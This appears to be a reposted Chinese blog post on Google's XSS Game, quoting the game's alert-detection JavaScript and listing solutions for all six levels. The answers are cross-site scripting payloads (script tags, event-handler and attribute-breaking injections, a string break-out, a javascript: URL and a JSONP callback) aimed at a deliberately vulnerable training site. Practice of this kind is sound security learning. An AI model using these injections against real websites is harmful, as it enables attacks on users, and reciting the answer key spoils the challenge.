有意思的游戏:Google XSS Game

来源:互联网 发布:php 上传文件进度 编辑:程序博客网 时间:2024/05/29 11:56

Google最近出了一个XSS的游戏:

https://xss-game.appspot.com/

我这个菜鸟看提示,花了两三个小时才全过了。。

这个游戏的规则是只要在攻击网页上弹出alert窗口就可以了。

题目页面是在iframe里嵌套的展现的,那么父窗口是如何知道iframe里成功弹出了窗口?

是这样子实现的:

题目页面加载了这个js,改写了alert函数,当alert被调用时,向parent发送一个消息。

https://xss-game.appspot.com/static/game-frame.js

/* If we're being iframed, let the parent know our URL *//* Kids: don't do this at home! */parent.postMessage(window.location.toString(), "*");/* Override window.alert */var originalAlert = window.alert;window.alert = function(s) {  parent.postMessage("success", "*");  setTimeout(function() {     originalAlert("Congratulations, you executed an alert:\n\n"       + s + "\n\nYou can now advance to the next level.");  }, 50);}
然后父窗口注册了一个EventListener来接收这个消息:

https://xss-game.appspot.com/static/game.js

window.addEventListener("message", function(event) {  if (!window.location.origin) {    window.location.origin = window.location.protocol + "//"         + window.location.hostname         + (window.location.port ? ':' + window.location.port: '');  }  if (event.origin == window.location.origin && event.data == "success") {    userOpenedAlert = true;    levelSolved();    return;  }

最下面是题目的答案。如果想自己玩游戏的,慎拉下。














题目的答案:

Level1:
<script>alert(1)</script>
Level2:
<input onmouseover="alert(1)">

Level3:

https://xss-game.appspot.com/level3/frame#3.jpg' onload="alert(1)">

Level4:

3');alert('1

Level5:

https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(1)

Level6:

重点是前面要有一个空格。

​ https://www.google.com/jsapi?callback=alert


游戏过关之后,google给出了一个xss的文档:

https://www.google.com/about/appsecurity/learning/xss/index.html


0 0
原创粉丝点击